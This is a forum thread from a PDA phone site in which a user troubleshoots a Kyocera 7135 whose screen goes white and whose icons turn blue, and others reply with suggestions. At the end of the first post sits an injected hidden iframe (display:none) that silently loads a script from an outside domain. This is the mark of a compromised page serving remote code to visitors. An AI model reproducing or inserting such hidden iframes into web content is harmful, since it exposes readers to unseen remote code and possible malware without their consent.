+ Reply to Thread

I knew things were going too well...

Strangeness has overtaken my Kyo... Picking it up off the cradle or after a few minutes of down time, the screen goes mostly all white (just the battery charge area is shown). I have to hit applications to get it back BUT when it comes back all my icons have turned blue. I use Launch 'em, but when I shut it down and use the palm launcher, same thing. Only a soft reset fixes it. It doesn't seem related to hot sync at all either.

This is starting to happen a few times a day now. I deleted all the datebk5 icon apps in case they were what was causing the icons to go blue... didn't work. But the white screen isn't icon related.

Anyone have a clue what could be happening?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

New one on me. Haven't seen (read) about this one. Standard problem resolution course would be to start to undo any applications recently installed back to the point where it worked. Make sure the battery is seated well too.

I woke up this morning eagerly looking for the responses to my screen problem, there was only one... (and I'm thankful for that). . . Has this happened to anyone else? The blue icons maybe?

Can someone help me out? There's gotta be someone here who has some ideas as to what's going on, or a work around?

I'm eagerly awaiting replies. Please help.

Thanks,

Tracey

I wish that I could help Tracey, but I have never heard of that one before. Perhaps call Kyo and trade for a new one, as it doesn't sound like a problem you want to deal with for the long haul.
    ~'kito
    pdaPhoneHome Moderator

I wonder how receptive Kyo would be to my asking for a return knowing I have a boatload of hacks and 2rd party apps running.

This did start after I tried Silver Screen for a couple of days, uninstalled and went back to Launch'em. I wonder if there's something left from the uninstall? I don't see anything in file manager...

t

Re: I knew things were going too well...

Originally posted by liltiki
    Strangeness has overtaken my Kyo... Picking it up off the cradle or after a few minutes of down time, the screen goes mostly all white (just the battery charge area is shown). I have to hit applications to get it back BUT when it comes back all my icons have turned blue. I use Launch 'em, but when I shut it down and use the palm launcher, same thing. Only a soft reset fixes it. It doesn't seem related to hot sync at all either.

This is starting to happen a few times a day now. I deleted all the datebk5 icon apps in case they were what was causing the icons to go blue... didn't work. But the white screen isn't icon related.

Anyone have a clue what could be happening?
    Have you tried adjusting the contrast and brightness levels? I've turned mine down b/c I find that sometimes when I open the flip, the 7135's LCD is overly bright and washes out the screen for some reason. Then when I close it and reopen it, it returns to the normal contract/brightness level -- but only if I've previously set my contrast and brightness levels to about the half-way mark (I find that these levels produce better colors anyways). Not sure whether this is a conflict with some of the programs I'm running or a flaw with the phone.